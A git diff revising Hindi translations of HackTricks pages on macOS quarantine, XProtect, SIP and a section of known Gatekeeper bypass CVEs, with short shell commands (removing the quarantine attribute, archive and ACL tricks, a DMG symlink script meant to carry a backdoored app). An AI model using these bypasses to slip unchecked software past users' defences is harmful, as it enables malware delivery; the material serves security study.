+```
+<details>
+
+और उस विशेषता को **हटाएं** इसके साथ:
 ```bash
 xattr -d com.apple.quarantine portada.png
 #You can also remove this attribute from every file with
 find . -iname '*' -print0 | xargs -0 xattr -d com.apple.quarantine
 ```
-और निम्नलिखित के साथ सभी क्वारंटाइन फ़ाइलें ढूंढ़ें:
+मैकोज़ गेटकीपर के साथ सभी क्वारंटीन की गई फाइलों को इस प्रकार खोजें:

 {% code overflow="wrap" %}
 ```bash
@ -198,15 +276,19 @@ find / -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf $9; pri
 ```
 {% endcode %}

-क्वारंटाइन जानकारी भी एक केंद्रीय डेटाबेस में संग्रहीत होती है जिसे लॉन्चसर्विसेज़ द्वारा प्रबंधित किया जाता है **`~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2`**.
+क्वारंटाइन जानकारी **`~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2`** में स्थित एक केंद्रीय डेटाबेस में भी संग्रहीत की जाती है जिसे LaunchServices प्रबंधित करता है।
+
+#### **Quarantine.kext**
+
+कर्नेल एक्सटेंशन केवल **सिस्टम पर कर्नेल कैश के माध्यम से** उपलब्ध है; हालांकि, आप **https://developer.apple.com/** से **Kernel Debug Kit** डाउनलोड कर सकते हैं, जिसमें एक्सटेंशन का सिम्बोलिकेटेड संस्करण होगा।

 ### XProtect

-XProtect मैकओएस में एक अंतरविषय-मैलवेयर सुरक्षा सुविधा है। XProtect **जाने माने मैलवेयर और असुरक्षित फ़ाइल प्रकारों के ख़िलाफ़ जब भी कोई एप्लिकेशन पहली बार चालू की जाती है या संशोधित की जाती है, तो उसे अपने डेटाबेस के ख़िलाफ़ जांचता है**। जब आप कुछ ऐप्स के माध्यम से फ़ाइल डाउनलोड करते हैं, जैसे Safari, Mail या Messages, XProtect फ़ाइल की स्वचालित जांच करता है। यदि इसके डेटाबेस में किसी जाने माने मैलवेयर के साथ मेल ख़ाता है, तो XProtect फ़ाइल को **चलाने से रोकेगा** और आपको ख़तरे के बारे में सूचित करेगा।
+XProtect macOS में एक निर्मित **एंटी-मैलवेयर** सुविधा है। XProtect **किसी भी एप्लिकेशन को जब पहली बार लॉन्च किया जाता है या संशोधित किया जाता है तो अपने डेटाबेस** के ज्ञात मैलवेयर और असुरक्षित फाइल प्रकारों के खिलाफ जांचता है। जब आप Safari, Mail, या Messages जैसे कुछ एप्स के माध्यम से फाइल डाउनलोड करते हैं, XProtect स्वचालित रूप से फाइल को स्कैन करता है। यदि यह अपने डेटाबेस में किसी भी ज्ञात मैलवेयर से मेल खाता है, तो XProtect **फाइल को चलने से रोक देगा** और आपको खतरे के बारे में सचेत करेगा।

-XProtect डेटाबेस को Apple द्वारा नई मैलवेयर परिभाषाओं के साथ **नियमित रूप से अपडेट किया जाता है**, और ये अपडेट आपके मैक पर स्वचालित रूप से डाउनलोड और स्थापित होते हैं। इससे यह सुनिश्चित होता है कि XProtect हमेशा नवीनतम ज्ञात ख़तरों के साथ अद्यतित रहता है।
+XProtect डेटाबेस को Apple द्वारा नए मैलवेयर परिभाषाओं के साथ **नियमित रूप से अपडेट** किया जाता है, और ये अपडेट स्वचालित रूप से आपके Mac पर डाउनलोड और स्थापित किए जाते हैं। इससे सुनिश्चित होता है कि XProtect हमेशा नवीनतम ज्ञात खतरों के साथ अद्यतन रहे।

-हालांकि, यह ध्यान देने योग्य है कि **XProtect एक पूर्ण सुविधा वाला एंटीवायरस समाधान नहीं है**। यह केवल एक निश्चित सूची के ज्ञात ख़तरों की जांच करता है और अधिकांश एंटीवायरस सॉफ़्टवेयर की तरह ऑन-एक्सेस स्कैनिंग नहीं करता है।
+हालांकि, यह ध्यान देने योग्य है कि **XProtect एक पूर्ण-विशेषता वाला एंटीवायरस समाधान नहीं है**। यह केवल ज्ञात खतरों की एक विशिष्ट सूची के लिए जांच करता है और अधिकांश एंटीवायरस सॉफ्टवेयर की तरह ऑन-एक्सेस स्कैनिंग नहीं करता है।

 आप नवीनतम XProtect अपडेट के बारे में जानकारी प्राप्त कर सकते हैं:

@ -216,40 +298,48 @@ system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistC
 ```
 {% endcode %}

-XProtect स्थित है। SIP सुरक्षित स्थान पर **/Library/Apple/System/Library/CoreServices/XProtect.bundle** और बंडल के अंदर आप XProtect का उपयोग करने के लिए जानकारी पा सकते हैं:
+XProtect **/Library/Apple/System/Library/CoreServices/XProtect.bundle** स्थित है और इस बंडल के अंदर आप XProtect द्वारा उपयोग की जाने वाली जानकारी पा सकते हैं:

-* **`XProtect.bundle/Contents/Resources/LegacyEntitlementAllowlist.plist`**: इन cdhashes के साथ कोड को पुरानी अधिकारिताओं का उपयोग करने देता है।
-* **`XProtect.bundle/Contents/Resources/XProtect.meta.plist`**: BundleID और TeamID के माध्यम से लोड करने के लिए अस्वीकृत किए जाने वाले प्लगइन और एक्सटेंशन की सूची या न्यूनतम संस्करण की संकेत करता है।
+* **`XProtect.bundle/Contents/Resources/LegacyEntitlementAllowlist.plist`**: इन cdhashes के साथ कोड को पुराने entitlements का उपयोग करने की अनुमति देता है।
+* **`XProtect.bundle/Contents/Resources/XProtect.meta.plist`**: प्लगइन्स और एक्सटेंशन्स की सूची जिन्हें BundleID और TeamID के माध्यम से या न्यूनतम संस्करण का संकेत देते हुए लोड करने की अनुमति नहीं है।
 * **`XProtect.bundle/Contents/Resources/XProtect.yara`**: मैलवेयर का पता लगाने के लिए Yara नियम।
-* **`XProtect.bundle/Contents/Resources/gk.db`**: अवरुद्ध अनुप्रयोगों और TeamID के हैश के साथ SQLite3 डेटाबेस।
+* **`XProtect.bundle/Contents/Resources/gk.db`**: अवरुद्ध एप्लिकेशन्स और TeamIDs के हैशेस के साथ SQLite3 डेटाबेस।

-ध्यान दें कि XProtect से संबंधित एक और ऐप है **`/Library/Apple/System/Library/CoreServices/XProtect.app`** जो Gatekeeper प्रक्रिया के साथ संलग्न नहीं है।
+ध्यान दें कि **`/Library/Apple/System/Library/CoreServices/XProtect.app`** में एक और ऐप है जो XProtect से संबंधित है लेकिन Gatekeeper प्रक्रिया में शामिल नहीं है।
+
+### Not Gatekeeper
+
+{% hint style="danger" %}
+ध्यान दें कि Gatekeeper **हर बार नहीं चलता** जब आप एक एप्लिकेशन को निष्पादित करते हैं, केवल _**AppleMobileFileIntegrity**_ (AMFI) ही **एक्जीक्यूटेबल कोड सिग्नेचर्स को सत्यापित करेगा** जब आप एक ऐसे एप्लिकेशन को निष्पादित करते हैं जिसे पहले ही Gatekeeper द्वारा सत्यापित किया जा चुका है।
+{% endhint %}
+
+इसलिए, पहले यह संभव था कि एक एप्लिकेशन को Gatekeeper के साथ कैश करने के लिए निष्पादित किया जाए, फिर **एप्लिकेशन की नॉन-एक्जीक्यूटेबल फाइलों को संशोधित करें** (जैसे कि Electron asar या NIB फाइलें) और यदि कोई अन्य सुरक्षा उपाय नहीं थे, तो एप्लिकेशन **निष्पादित** होता था **मैलिशस** जोड़ों के साथ।
+
+हालांकि, अब यह संभव नहीं है क्योंकि macOS **एप्लिकेशन बंडलों के अंदर फाइलों को संशोधित करने से रोकता है**। इसलिए, यदि आप [Dirty NIB](../macos-proces-abuse/macos-dirty-nib.md) हमले की कोशिश करते हैं, तो आप पाएंगे कि इसका दुरुपयोग करना अब संभव नहीं है क्योंकि Gatekeeper के साथ एप्लिकेशन को कैश करने के बाद, आप बंडल को संशोधित नहीं कर पाएंगे। और यदि आप उदाहरण के लिए Contents निर्देशिका का नाम NotCon में बदलते हैं (जैसा कि एक्सप्लॉइट में इंगित किया गया है), और फिर एप्लिकेशन के मुख्य बाइनरी को Gatekeeper के साथ कैश करने के लिए निष्पादित करते हैं, तो यह एक त्रुटि को ट्रिगर करेगा और निष्पादित नहीं होगा।

 ## Gatekeeper Bypasses

-Gatekeeper को बाइपास करने का कोई भी तरीका (उपयोगकर्ता को कुछ डाउनलोड करने और गेटकीपर द्वारा इसे अनुमति नहीं देने पर इसे क्रियान्वित करने में सफल होना) macOS में एक सुरक्षा दुर्बलता के रूप में मानी जाती है। निम्नलिखित कुछ CVEs तक द्वारा बाइपास करने की तकनीकों को अनुमति दी गई थी:
+Gatekeeper को बायपास करने का कोई भी तरीका (उपयोगकर्ता को कुछ डाउनलोड करने और निष्पादित करने के लिए प्रबंधित करना जब Gatekeeper को इसे अस्वीकार करना चाहिए) macOS में एक सुरक्षा दोष माना जाता है। ये कुछ CVE हैं जो अतीत में Gatekeeper को बायपास करने की तकनीकों को सौंपे गए थे:

 ### [CVE-2021-1810](https://labs.withsecure.com/publications/the-discovery-of-cve-2021-1810)

-**Archive Utility** द्वारा निकाले जाने पर, **886** वर्णों से लंबे फ़ाइल **प्राप्त करने में विफल रहेंगी** जो com.apple.quarantine विस्तारित गुणधर्म को अनुग्रहित नहीं करेगी, जिससे इन फ़ाइलों को **गेटकीपर को बाइपास करने के लिए** संभव होगा।
+**Archive Utility** द्वारा निकाले गए फाइलों के **पथ जो 886** वर्णों से अधिक लंबे होते हैं, वे com.apple.quarantine विस्तारित विशेषता को विरासत में प्राप्त करने में विफल हो जाते हैं, जिससे उन फाइलों के लिए Gatekeeper को **बायपास करना संभव हो जाता है**।

-अधिक जानकारी के लिए [**मूल रिपोर्ट**](https://labs.withsecure.com/publications/the-discovery-of-cve-2021-1810) की जांच करें।
+अधिक जानकारी के लिए [**मूल रिपोर्ट**](https://labs.withsecure.com/publications/the-discovery-of-cve-2021-1810) देखें।

 ### [CVE-2021-30990](https://ronmasas.com/posts/bypass-macos-gatekeeper)

-जब एक एप्लिकेशन **Automator** के साथ बनाई जाती है, इसके क्रियान्वयन के बारे में जानकारी `application.app/Contents/document.wflow` में होती है न कि क्रियान्वयक। क्रियान्वयक केवल एक साधारण Automator बाइनरी है जिसे **Automator Application Stub** कहा जाता है।
+जब एक एप्लिकेशन **Automator** के साथ बनाया जाता है, तो इसे निष्पादित करने के लिए जरूरी जानकारी `application.app/Contents/document.wflow` के अंदर होती है, न कि एक्जीक्यूटेबल में। एक्जीक्यूटेबल सिर्फ एक सामान्य Automator बाइनरी होती है जिसे **Automator Application Stub** कहा जाता है।

-इसलिए, आप `application.app/Contents/MacOS/Automator\ Application\ Stub` को **एक प्रतीकात्मक लिंक के साथ दूसरे सिस्टम के Automator Application Stub की ओर पहुंचा सकते हैं** और यह `document.wflow` (आपका स्क्रिप्ट) के अंदर है क्रियान्वित करेगा **गेटकीपर को ट्रिगर नहीं करता** क्योंकि वास्तविक क्रियान्वयक के पास अवरोध एक्सट्रिब्यूट नहीं है।
+इसलिए, आप `application.app/Contents/MacOS/Automator\ Application\ Stub` को सिस्टम के अंदर एक अन्य Automator Application Stub की ओर एक सिम्बोलिक लिंक के साथ **पॉइंट कर सकते हैं** और यह `document.wflow` के अंदर क्या है (आपकी स्क्रिप्ट) **बिना Gatekeeper को ट्रिगर किए** निष्पादित करेगा क्योंकि वास्तविक एक्जीक्यूटेबल में quarantine xattr नहीं होता है।&#x20;

-उम्मीदित स्थान का उदाहरण: `/System/Library/CoreServices/Automator\ Application\ Stub.app/Contents/MacOS/Automator\ Application\ Stub`
+उम्मीद की जाने वाली स्थान का उदाहरण: `/System/Library/CoreServices/Automator\ Application\ Stub.app/Contents/MacOS/Automator\ Application\ Stub`

-अधिक जानकारी के लिए [**मूल रिपोर्ट**](https://ronmasas.com/posts/bypass-macos-gatekeeper) की जांच करें।
+अधिक जानकारी के लिए [**मूल रिपोर्ट**](https://ronmasas.com/posts/bypass-macos-gatekeeper) देखें।

 ### [CVE-2022-22616](https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/)

-इस बाइपास में एक ज़िप फ़ाइल एक ऐप्लिकेशन के साथ बनाई गई थी जो `application.app/Contents` से शुरू होकर संपीड़ित होने लगी थी बजाय `application.app` से। इसलिए, **अवरोध गुणधर्म** `application.app/Contents` के सभी **फ़ाइलों पर लागू किया गया था** लेकिन **`application.app` पर नहीं**, जिसे गेटकीपर जांच रहा था, इसलिए गेटकीपर को बाइपास किया गया क्योंकि `application.app` ट्रिगर होने पर उसमें **अवरोध गुणधर्म नहीं था**।
-
-अधिक जानकारी के लिए [**मूल रिपोर्ट**](https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/) की जांच करें।
+इस बायपास में एक zip फाइल `application.app/Contents` से शुरू होकर संपीड़ित की गई थी, न कि `application.app` से। इसलिए, **quarantine attr** सभी **फाइलों पर `application.app/Contents`** पर लागू किया गया था लेकिन **`application.app` पर नहीं**, जिसे Gatekeeper जांच रहा था, इसलिए Gatekeeper को बायपास किया गया क्योंकि जब `application.app` को ट्रिगर किया गया तो उसमें **quarantine विशेषता नहीं थी।**
 ```bash
 zip -r test.app/Contents test.zip
 ```
@ -257,39 +347,50 @@ zip -r test.app/Contents test.zip

 ### [CVE-2022-32910](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32910)

-हालांकि तत्व अलग हों, इस कमजोरी का शोधार्थीकरण पिछले वाले के बहुत समान है। इस मामले में हम **`application.app/Contents`** से एक Apple Archive उत्पन्न करेंगे, ताकि **`application.app` को quarantine एट्रिब्यूट न मिले** जब **Archive Utility** द्वारा अनबंधित किया जाए।
+भले ही घटक अलग हों, इस भेद्यता का शोषण पिछले एक के समान ही है। इस मामले में हम **`application.app/Contents`** से एक Apple Archive बनाएंगे ताकि **`application.app`** को **Archive Utility** द्वारा डिकंप्रेस किए जाने पर quarantine attr न मिले।
 ```bash
 aa archive -d test.app/Contents -o test.app.aar
 ```
-अधिक जानकारी के लिए [**मूल रिपोर्ट**](https://www.jamf.com/blog/jamf-threat-labs-macos-archive-utility-vulnerability/) की जांच करें।
+अधिक जानकारी के लिए [**मूल रिपोर्ट**](https://www.jamf.com/blog/jamf-threat-labs-macos-archive-utility-vulnerability/) देखें।

 ### [CVE-2022-42821](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/)

-ACL **`writeextattr`** का उपयोग करके किसी भी व्यक्ति को एक फ़ाइल में एक गुण लिखने से रोका जा सकता है:
+ACL **`writeextattr`** का उपयोग किसी फाइल में एक विशेषता लिखने से किसी को भी रोकने के लिए किया जा सकता है:
 ```bash
 touch /tmp/no-attr
 chmod +a "everyone deny writeextattr" /tmp/no-attr
 xattr -w attrname vale /tmp/no-attr
 xattr: [Errno 13] Permission denied: '/tmp/no-attr'
 ```
-इसके अलावा, **AppleDouble** फ़ाइल प्रारूप एक फ़ाइल की ACEs के साथ एक फ़ाइल की प्रतिलिपि बनाता है।
+इसके अलावा, **AppleDouble** फाइल प्रारूप एक फाइल की प्रतिलिपि उसके ACEs सहित बनाता है।

-[**स्रोत कोड**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html) में देखा जा सकता है कि **`com.apple.acl.text`** नामक xattr में संग्रहीत ACL पाठ प्रतिष्ठान के रूप में सेट किया जाएगा। इसलिए, यदि आपने एक ऐप्लिकेशन को एक zip फ़ाइल में **AppleDouble** फ़ाइल प्रारूप के साथ संक्षिप्त किया है जिसमें एक ACL है जो इसे अन्य xattr को लिखने से रोकता है... तो quarantine xattr को ऐप्लिकेशन में सेट नहीं किया गया था:
+[**सोर्स कोड**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html) में यह देखा जा सकता है कि xattr **`com.apple.acl.text`** में संग्रहीत ACL पाठ प्रतिनिधित्व, डिकम्प्रेस्ड फाइल में ACL के रूप में सेट किया जाएगा। इसलिए, यदि आपने एक एप्लिकेशन को **AppleDouble** फाइल प्रारूप में एक zip फाइल में संपीड़ित किया है जिसमें एक ACL है जो अन्य xattrs को उस पर लिखने से रोकता है... तो एप्लिकेशन में quarantine xattr सेट नहीं किया गया था:
+
+{% code overflow="wrap" %}
 ```bash
 chmod +a "everyone deny write,writeattr,writeextattr" /tmp/test
 ditto -c -k test test.zip
 python3 -m http.server
-# Download the zip from the browser and decompress it, the file shuold be without a wuarantine xattr
+# Download the zip from the browser and decompress it, the file should be without a quarantine xattr
 ```
+{% endcode %}
+
 अधिक जानकारी के लिए [**मूल रिपोर्ट**](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/) देखें।

+ध्यान दें कि इसका शोषण AppleArchives के साथ भी किया जा सकता है:
+```bash
+mkdir app
+touch app/test
+chmod +a "everyone deny write,writeattr,writeextattr" app/test
+aa archive -d app -o test.aar
+```
 ### [CVE-2023-27943](https://blog.f-secure.com/discovery-of-gatekeeper-bypass-cve-2023-27943/)

-यह पाया गया कि **Google Chrome डाउनलोड की गई फ़ाइलों को quarantine विशेषता सेट नहीं कर रहा था** क्योंकि कुछ macOS आंतरिक समस्याओं के कारण।
+यह पता चला कि **Google Chrome डाउनलोड की गई फाइलों को quarantine attribute सेट नहीं कर रहा था** क्योंकि macOS की कुछ आंतरिक समस्याओं के कारण।

 ### [CVE-2023-27951](https://redcanary.com/blog/gatekeeper-bypass-vulnerabilities/)

-AppleDouble फ़ाइल प्रारूप एक अलग फ़ाइल में फ़ाइल की विशेषताओं को संग्रहीत करते हैं, जो `._` से शुरू होती है, यह मदद करता है **macOS मशीनों के बीच फ़ाइल विशेषताओं की प्रतिलिपि बनाने में**। हालांकि, ध्यान दिया गया कि AppleDouble फ़ाइल को डीकंप्रेस करने के बाद, `._` से शुरू होने वाली फ़ाइल को **quarantine विशेषता नहीं दी गई थी**।
+AppleDouble फाइल फॉर्मेट्स एक अलग फाइल में फाइल के गुणों को संग्रहीत करते हैं जो `._` से शुरू होती है, यह **macOS मशीनों के बीच** फाइल गुणों की प्रतिलिपि बनाने में मदद करता है। हालांकि, यह देखा गया कि AppleDouble फाइल को डिकंप्रेस करने के बाद, `._` से शुरू होने वाली फाइल को quarantine attribute नहीं दिया गया था।

 {% code overflow="wrap" %}
 ```bash
@ -303,8 +404,8 @@ aa archive -d test/ -o test.aar
 ```
 {% endcode %}

-गेटकीपर को अनदेखा करने के लिए एक ऐसा फ़ाइल बनाने की क्षमता होने के कारण, यह **संभव था।** यह चाल थी कि एक **DMG फ़ाइल एप्लिकेशन बनाएं** जो AppleDouble नाम संविधान का उपयोग करता है (इसे `._` से शुरू करें) और इस छिपे हुए फ़ाइल के बिना किसी **दिखाई देने वाली फ़ाइल को संकेत रूप में बनाएं** जिसमें कोई क्वारंटाइन गुण नहीं है।\
-जब **dmg फ़ाइल को निष्पादित किया जाता है**, क्योंकि इसमें कोई क्वारंटाइन गुण नहीं होता है, इसलिए यह **गेटकीपर को अनदेखा करेगा**।
+क्वारंटाइन एट्रिब्यूट सेट न होने वाली फाइल बनाने में सक्षम होने से, **Gatekeeper को बायपास करना संभव था।** चाल यह थी कि **AppleDouble नाम संविधान का उपयोग करके DMG फाइल एप्लिकेशन बनाएं** (इसे `._` से शुरू करें) और एक **दृश्यमान फाइल को इस छिपी** फाइल के लिए सिम लिंक के रूप में बनाएं जिसमें क्वारंटाइन एट्रिब्यूट नहीं है।\
+जब **dmg फाइल निष्पादित की जाती है**, चूंकि इसमें क्वारंटाइन एट्रिब्यूट नहीं होता, यह **Gatekeeper को बायपास कर देगी।**
 ```bash
 # Create an app bundle with the backdoor an call it app.app

@ -320,14 +421,20 @@ ln -s ._app.dmg s/app/app.dmg
 echo "[+] compressing files"
 aa archive -d s/ -o app.aar
 ```
+### क्वारंटाइन xattr रोकें
+
+यदि ".app" बंडल में क्वारंटाइन xattr जोड़ा नहीं गया है, तो इसे निष्पादित करते समय **Gatekeeper सक्रिय नहीं होगा**।
+
 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>शून्य से लेकर हीरो तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>

-* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित करना** चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
-* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
-* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
-* **अपने हैकिंग ट्रिक्स साझा करें,** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके।**
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
+* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**।
+* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।

 </details>
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md
@ -2,26 +2,28 @@

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें</strong></summary>

-* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
+* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
 * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
-* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
-* **हैकिंग ट्रिक्स साझा करें, [**hacktricks repo**](https://github.com/carlospolop/hacktricks) और [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.**
+* 💬 [**Discord समूह में शामिल हों**](https://discord.gg/hRep4RUj7f) या [**telegram समूह**](https://t.me/peass) में शामिल हों या मुझे **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) पर **फॉलो करें**.
+* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग तरकीबें साझा करें.

 </details>

 ## **मूल जानकारी**

-**System Integrity Protection (SIP)** macOS में एक सुरक्षा प्रौद्योगिकी है जो अनधिकृत पहुँच से कुछ सिस्टम निर्देशिकाओं की रक्षा करती है, यहाँ तक कि रूट उपयोगकर्ता के लिए भी। यह इन निर्देशिकाओं में संशोधनों को रोकता है, जिसमें फाइलों का निर्माण, परिवर्तन, या विलोपन शामिल है। SIP द्वारा संरक्षित मुख्य निर्देशिकाएँ हैं:
+**System Integrity Protection (SIP)** macOS में एक सुरक्षा प्रौद्योगिकी है जो अनधिकृत पहुँच से कुछ सिस्टम डायरेक्टरीज़ की रक्षा करती है, यहाँ तक कि रूट यूज़र के लिए भी। यह इन डायरेक्टरीज़ में फाइलों के निर्माण, परिवर्तन, या हटाने सहित संशोधनों को रोकता है। SIP द्वारा संरक्षित मुख्य डायरेक्टरीज़ हैं:

 * **/System**
 * **/bin**
 * **/sbin**
 * **/usr**

-इन निर्देशिकाओं और उनकी उपनिर्देशिकाओं के लिए सुरक्षा नियम **`/System/Library/Sandbox/rootless.conf`** फाइल में निर्दिष्ट हैं। इस फाइल में, एक तारांकन (\*) के साथ शुरू होने वाले पथ SIP की प्रतिबंधों के अपवादों को दर्शाते हैं।
+इन डायरेक्टरीज़ और उनकी सबडायरेक्टरीज़ के लिए सुरक्षा नियम **`/System/Library/Sandbox/rootless.conf`** फाइल में निर्दिष्ट हैं। इस फाइल में, एक तारांकन (\*) के साथ शुरू होने वाले पथ SIP की प्रतिबंधों के अपवाद को दर्शाते हैं।

 उदाहरण के लिए, निम्नलिखित कॉन्फ़िगरेशन:
 ```javascript
@ -32,7 +34,7 @@
 ```
 यह दर्शाता है कि **`/usr`** निर्देशिका आम तौर पर SIP द्वारा संरक्षित होती है। हालांकि, तीन उपनिर्देशिकाओं में संशोधन की अनुमति है (`/usr/libexec/cups`, `/usr/local`, और `/usr/share/man`), क्योंकि वे एक अग्रणी तारांकन (\*) के साथ सूचीबद्ध हैं।

-यह जांचने के लिए कि कोई निर्देशिका या फ़ाइल SIP द्वारा संरक्षित है या नहीं, आप **`ls -lOd`** कमांड का उपयोग कर सकते हैं **`restricted`** या **`sunlnk`** फ्लैग की उपस्थिति की जांच के लिए। उदाहरण के लिए:
+SIP द्वारा किसी निर्देशिका या फ़ाइल की सुरक्षा की जांच करने के लिए, आप **`ls -lOd`** कमांड का उपयोग करके **`restricted`** या **`sunlnk`** फ्लैग की उपस्थिति की जांच कर सकते हैं। उदाहरण के लिए:
 ```bash
 ls -lOd /usr/libexec/cups
 drwxr-xr-x  11 root  wheel  sunlnk 352 May 13 00:29 /usr/libexec/cups
@ -44,18 +46,18 @@ drwxr-xr-x  11 root  wheel  sunlnk 352 May 13 00:29 /usr/libexec/cups
 ls -lOd /usr/libexec
 drwxr-xr-x  338 root  wheel  restricted 10816 May 13 00:29 /usr/libexec
 ```
-यहाँ, **`restricted`** फ्लैग दर्शाता है कि `/usr/libexec` डायरेक्टरी SIP द्वारा सुरक्षित है। SIP-सुरक्षित डायरेक्टरी में, फाइलों को बनाया, संशोधित, या हटाया नहीं जा सकता है।
+यहाँ, **`restricted`** फ्लैग दर्शाता है कि `/usr/libexec` डायरेक्टरी SIP द्वारा संरक्षित है। SIP-संरक्षित डायरेक्टरी में, फाइलों को बनाया, संशोधित, या हटाया नहीं जा सकता है।

-इसके अलावा, यदि किसी फाइल में **`com.apple.rootless`** विस्तारित **एट्रिब्यूट** है, तो वह फाइल भी **SIP द्वारा सुरक्षित** होगी।
+इसके अलावा, यदि किसी फाइल में **`com.apple.rootless`** विस्तारित **एट्रिब्यूट** होता है, तो वह फाइल भी **SIP द्वारा संरक्षित** होगी।

 **SIP अन्य रूट क्रियाओं को भी सीमित करता है** जैसे:

-* अविश्वसनीय कर्नेल एक्सटेंशन्स लोड करना
+* अविश्वसनीय कर्नेल एक्सटेंशन्स को लोड करना
 * Apple-हस्ताक्षरित प्रक्रियाओं के लिए टास्क-पोर्ट्स प्राप्त करना
 * NVRAM वेरिएबल्स में संशोधन करना
 * कर्नेल डिबगिंग की अनुमति देना

